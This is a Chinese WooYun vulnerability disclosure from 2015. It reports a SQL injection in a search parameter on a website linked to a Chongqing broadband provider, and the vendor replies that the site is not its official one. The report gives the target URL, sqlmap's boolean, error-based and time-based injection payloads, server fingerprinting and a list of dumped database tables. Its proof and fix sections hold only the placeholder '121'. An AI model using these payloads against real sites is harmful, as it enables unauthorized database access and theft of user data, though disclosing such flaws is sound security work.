当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0134972

漏洞标题:艾普宽带某站sql注入漏洞

相关厂商:艾普宽带

漏洞作者: 日出东方

提交时间:2015-08-18 11:49

修复时间:2015-10-03 09:02

公开时间:2015-10-03 09:02

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:11

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-18: 细节已通知厂商并且等待厂商处理中
2015-08-19: 厂商已经确认,细节仅向厂商公开
2015-08-29: 细节向核心白帽子及相关领域专家公开
2015-09-08: 细节向普通白帽子公开
2015-09-18: 细节向实习白帽子公开
2015-10-03: 细节向公众公开

简要描述:

艾普宽带某站sql注入漏洞
乌云的搜索功能,路人用不了了,想搜索看看重没重复都不能。。。

详细说明:

http://www.cqaipu666.com/news/index.php?catid=0&key=a&imageField.x=31&imageField.y=10
参数key未过滤
管理员亲,之前的注入点都修复了,这个没修复。
上sqlmap
Parameter: key (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: catid=0&key=a' AND 6097=6097 AND 'bgHz'='bgHz&imageField.x=31&image
Field.y=10
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY cl
ause
Payload: catid=0&key=a' AND (SELECT 7998 FROM(SELECT COUNT(*),CONCAT(0x71707
06271,(SELECT (ELT(7998=7998,1))),0x716a717a71,FLOOR(RAND(0)*2))x FROM INFORMATI
ON_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'KvoA'='KvoA&imageField.x=31&imageFie
ld.y=10
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: catid=0&key=a' AND (SELECT * FROM (SELECT(SLEEP(5)))zgaI) AND 'CRjH
'='CRjH&imageField.x=31&imageField.y=10
---
[11:06:47] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003 or XP
web application technology: Microsoft IIS 6.0, PHP 5.2.17
back-end DBMS: MySQL 5.0
显错注入
current database: 'sjkcqaipu666'
[11:30:20] [INFO] fetching tables for database: 'sjkcqaipu666'
[11:30:23] [WARNING] reflective value(s) found and filtering out
[11:30:23] [INFO] the SQL query used returns 101 entries
[11:30:25] [INFO] retrieved: pwn_advs_duilian
[11:30:26] [INFO] retrieved: pwn_advs_lb
[11:30:27] [INFO] retrieved: pwn_advs_lbgroup
[11:30:28] [INFO] retrieved: pwn_advs_link
[11:30:28] [INFO] retrieved: pwn_advs_linkgroup
[11:30:29] [INFO] retrieved: pwn_advs_logo
[11:30:30] [INFO] retrieved: pwn_advs_movi
[11:30:31] [INFO] retrieved: pwn_advs_pic
[11:30:32] [INFO] retrieved: pwn_advs_pop
[11:30:33] [INFO] retrieved: pwn_advs_text
[11:30:34] [INFO] retrieved: pwn_base_admin
.......
是不是重庆的用户信息都泄露了呢。。

漏洞证明:

121

修复方案:

121

版权声明:转载请注明来源 日出东方@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:1

确认时间:2015-08-19 09:01

厂商回复:

感谢提供,非艾普宽带官方网站。

最新状态:

暂无